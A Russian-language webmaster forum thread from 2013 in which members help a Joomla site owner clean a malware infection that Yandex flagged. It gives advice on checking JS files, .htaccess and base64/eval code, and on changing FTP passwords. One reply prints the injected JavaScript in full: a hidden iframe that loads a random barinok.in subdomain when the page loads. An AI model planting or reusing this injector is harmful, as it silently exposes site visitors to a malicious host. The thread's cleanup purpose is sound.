Всем привет!
На днях на почту пришло письмо "яндекс обнаружил на сайте seo-top(точка)by вредоносный код"
Сайт содержит Troj/JSRedir-LR, Troj/ExpJS-JU
Никогда не имел дела с таким... прошу помощи у форумчан. Подскажите пожалуйста, что за ерунда такая и как избавиться от этого?
Заранее благодарен за помощь!
- 02.09.2013 22:10
- 02.09.2013 22:57
Судя по названию это javascript редирект. Обычно такие штуки ставят для того чтобы сливать мобильный трафик через бэкдор. Нужно проверить все файлы с расширением *.js скорее всего ссылки на оные в шаблоне.
---------- Сообщение добавлено 21:57 ---------- Предыдущее 21:56 ----------
VadimPRO, нашел следы странного сайта на главной странице...
_uuroo5pi.barinok.inСпасибо сказали:
VadimPRO(03.09.2013), - 02.09.2013 23:13Banned

- Регистрация: 14.10.2011
- Сообщений: 586
- Репутация: 77
Что за движок для начала скажите?
Для того чтобы найти вирус сохраните страницу в html формате и просмотрерите код, обычно или в самом начале или вверху находится вирус. Если сайт на движке, а он вроде как на движке, то просмотрите индексовый файл, там скорей всего добавлен eval64 код, сравните с дистрибутивами движка свой файл.
ps. Какому недоумку могло быть надо сунуть вирус на такой сайт?? У меня софтовые постоянно ломают и пихают интсалмонстер, мидлеты и прочее.Спасибо сказали:
VadimPRO(03.09.2013), - 02.09.2013 23:51
Не забудьте проверить .htaccess на предмет мобильных редиректов.
Спасибо сказали:
VadimPRO(03.09.2013), - 03.09.2013 00:46
Спасибо сказали:
VadimPRO(03.09.2013), - 03.09.2013 01:06
ищите в коде страницы сами ссылки, потом смотрите как они выводятся, просматривайте соответствующие файлы, ищите в них подозрительную дрянь вроде бейс64, удаляйте, потом обновляйте движок, меняйте пароли фтп и т.п.
Либо обращайтесь к специалистам.Спасибо сказали:
VadimPRO(03.09.2013), - 03.09.2013 01:32
Спасибо ребята!) Блин вот угораздило же на такую хрень попасть... Трафика сразу вообще не стало...
---------- Сообщение добавлено 23:32 ---------- Предыдущее 23:29 ----------
ramazanaman, Движок Joomla 2.5.8 - 03.09.2013 02:13
Посмотрите здесь - лекарство должно помочь, если eval(base64...
Спасибо сказали:
VadimPRO(03.09.2013), - 03.09.2013 02:58
Гендальф Серый, Спасибо, попробую ваш скрипт
- 03.09.2013 08:15
1. в файле
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
вирусный код надо убрать или восстановить с бекапа:PHP код:2. поменять все пароли ftp.var ifoe2Xu = document.createElement('iframe');ifoe2Xu.name = 'ifoe2Xu';ifoe2Xu.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'barinok.in/';ifoe2Xu.style.width = '0px';ifoe2Xu.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifoe2Xu=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifoe2Xu);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifoe2Xu=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
вроде все)Спасибо сказали:
VadimPRO(03.09.2013),
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Уважаемые мастера, помогите убрать www с адреса сайта! | WordPress | 4 | 03.06.2013 16:13 |
Помогите удалить вирус | Вопросы от новичков | 4 | 18.03.2013 21:02 |
Помогите убрать невидимую ссылку из сайта | Вопросы от новичков | 6 | 23.02.2012 09:48 |
Помогите исправить: яндекс нашел вирус. | Поисковые системы | 7 | 01.09.2011 23:59 |
Ребят помогите. Вирус на сайте | Прочее | 0 | 06.02.2011 03:36 |








